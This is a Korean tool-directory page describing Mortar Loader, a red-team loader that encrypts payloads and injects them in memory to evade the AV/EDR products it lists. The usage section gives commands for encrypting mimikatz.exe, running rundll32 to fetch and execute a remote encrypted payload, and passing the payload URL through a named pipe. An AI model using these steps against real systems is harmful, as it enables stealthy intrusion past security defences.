Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/0xsp-srd/mortar
Exploit FrameworksPayload GenerationIDS/IPS EvasionShellcodeRed Teaming
GitHub0xsp-srd/mortar

mortar

회피 기술로, 보안 제품(AV/EDR/XDR)의 탐지 및 차단을 무력화하고 우회합니다.

저장소 보기
1.5k2382년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Mortar Loader

레드 팀 은폐 기술로 보안 제품의 탐지 및 차단을 우회하고 회피합니다. Mortar Loader는 메모리 스트림 내에서 PE/쉘코드의 암호화 및 복호화를 수행하고 여러 인젝션 기술을 활용하여 실행합니다.
Mortar는 최신 안티바이러스 제품과 고급 XDR 솔루션을 우회할 수 있으며, 다음 제품들에 대해 테스트 및 우회가 확인되었습니다:

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

업데이트된 기능

최신 버전(v3)에는 다음과 같은 기능이 포함되어 출시되었습니다:

  • 파일리스 실행: 원격 스테이징된 암호화된 바이너리 또는 쉘코드.
  • 얼리 버드 APC 인젝션.
  • 프로세스 위장.
  • Named Pipes 지원.
  • 문자열 및 함수 호출 난독화.
  • Mortar 은밀한 재로드 서브루틴.
  • 지연 실행 기술.

자세한 기술 설명은 다음 블로그 포스트를 참조하십시오: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

사용법

암호화기

암호화기는 C 쉘코드와 PE 바이너리를 암호화하여 .enc 파일로 출력합니다. x64 아키텍처이고 RAW 형식이 아닌 모든 페이로드(MSF/Cobalt/Havoc 등)를 사용할 수 있습니다.

root@kitploit:~
root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Mortar Loader 라이브러리

최신 릴리스는 원격 페이로드 페칭과 결합된 여러 기술을 활용합니다. 더 많은 통찰력을 얻으려면 다음 블로그 포스트를 참조하는 것이 좋습니다.

간단한 사용 지침

root@kitploit:~
# PE Forking

1. host your encrypted binary on remote host. 
2. encode the final URL with base64. 
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled. 

현재 Named Pipes와 결합된 얼리 버드 인젝션을 지원하여 최종 실행을 위한 변수를 수신합니다.

root@kitploit:~
1. Mortar DLL을 원격 프로세스에 인젝션합니다(DLL 인젝션, 하이재킹, 사이드로딩).
2. Named Pipe에 연결하여 URL을 제공합니다.
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. 유효한 값이 수신되면 페이로드가 실행됩니다. 

컴파일

이 프로젝트는 FPC(Free Pascal)로 코딩되었으며, 컴파일 절차는 Lazarus IDE를 다운로드하여 설치하면 간단합니다(https://www.lazarus-ide.org/index.php?page=downloads).

암호화기는 릴리스 섹션에서 다운로드하거나 Lazarus IDE로 쉽게 컴파일할 수 있습니다.

root@kitploit:~
#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

관련 자료

  • v1 릴리스 : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Mortar Loader v2 기능 : https://0xsp.com/offensive/mortar-loader-v2/
  • CrestCon Asia 2021 발표 : https://www.youtube.com/watch?v=H7EMBz7GLMk

후원?

Mortar 또는 모든 공유 프로젝트의 개발은 개인 시간을 투자한 결과입니다.

  • 제 작업에 대한 지속적인 감사를 표시하십시오.
  • 프리릴리스에 조기 접근할 수 있습니다.
  • 질문을 하면 답변해 드립니다.
도구 다운로드